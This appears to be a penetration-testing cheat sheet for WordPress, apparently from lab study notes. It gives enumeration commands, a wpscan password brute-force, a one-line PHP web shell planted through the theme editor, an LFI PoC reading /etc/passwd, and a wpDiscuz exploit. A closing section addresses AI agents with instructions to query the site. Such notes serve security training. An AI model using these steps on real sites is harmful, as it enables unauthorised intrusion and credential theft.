# WordPress

<table><thead><tr><th width="178">User Role</th><th>Description</th></tr></thead><tbody><tr><td>Administrator</td><td>Full Privileges - This user role is an interesting target due to his capability of managing plugins</td></tr><tr><td>Editor</td><td>Can publish and manage any user's posts - This user role is an interesting target due to his capability of managing plugins</td></tr><tr><td>Author</td><td>Can publish and manage their posts</td></tr><tr><td>Contributor</td><td>Can write and manage their own post, but he cannot publish them</td></tr><tr><td>Subscriber</td><td>Can view posts and manage/modify their profile</td></tr></tbody></table>

Getting access to an administrator is usually sufficient to obtain code execution on the server.\
Editors and authors might have access to certain vulnerable plugins, which normal users don’t.

***

## **WordPress Discovery/Footprinting**

**Manual Identification:**

* Check if the `robots.txt` file contains any wordpress entry
* Check if `/wp-admin`, `/wp-content`, `xmlrpc.php` or wordpress-related artifacts exist.
* Search the WP version inside the page source code:\
  `curl example.com | grep '<meta name="generator"'`
* Search the WP version inside the `css` or `js` files:\
  `curl example.com | grep '?ver='`
* Find the version inside `readme.html` (only works for old ones)

Identification using WPScan:

* `wpscan --url example.com --enumerate --api-token TOKENVALUE`

Plugins Enumeration:

* `curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2`
* You can also try enumerating whether a plugin is in use by navigating to the plugin's directory and checking whether the web application redirects to the complete folder (via a 3XX redirect)\
  `curl -I -X GET http://example.com/wp-content/plugins/mail-masta` <- misses the last `/`&#x20;
* If the application answers with 3XX redirect, the plugin exists. If it answers with a 404, it does not.

{% hint style="info" %}
This technique allows you to find installed plugins, which could be deactivated.
{% endhint %}

Themes Enumeration:

* `curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2`

***

## **User Enumeration**

Some versions of WordPress logins allow enumerating usernames due to verbose error messages stating whether a username is right or not.&#x20;

Alternative methods are:

1. Use the `?author=` GET parameter to check whether the page redirects you to a valid user's page:\
   `curl -s -I http://example.com/?author=1`
2. Check usernames inside the `wp-json` `users` file:\
   `curl http://example.com/wp-json/wp/v2/users | jq`

After you found a valid username, you can use `wpscan` to bruteforce a valid user's password:\
`sudo wpscan --password-attack xmlrpc -t 20 -U admin, sfoffo -P /usr/share/wordlists/rockyou.txt --url https://example.com`

{% hint style="danger" %}
Some WordPress instances may lock-out a user after few invalid attempts&#x20;
{% endhint %}

***

## **Admin User - Remote Code Execution**

> An aministrator account may edit PHP code in order to gain RCE.\
> Note: when editing an active theme or plugin you may encounter errors. Deactivate them first.

**The steps are the following:**

* **Semi-automatically, using `msfconsole`**:\
  `use exploit/unix/webapp/wp_admin_shell_upload`
* **Manually, by modifying a theme:**
  1. Login as administrator.\
     Navigate to: appearance → side panel → theme editor → select a theme
  2. Add the following to the theme: `system($_GET[0]);`
  3. Use the following URL to gain RCE: `http://example.test/wp-content/themes/THEMENAME/FILEPHPNAME.PHP?0=id`

***

## **WordPress Known Vulnerable Plugins**

1. **`Mail-Masta` allows LFI by using the following PoC:** `curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd`
2. `wpDiscuz` allows RCE by using the following PoC:
   * [ExploitDB](https://www.exploit-db.com/exploits/49967): `python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1`
   * if it fails, use `cURL` to execute commands using the uploaded web shell: `curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.sfoffo.com/web-applications/web-technologies/wordpress.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.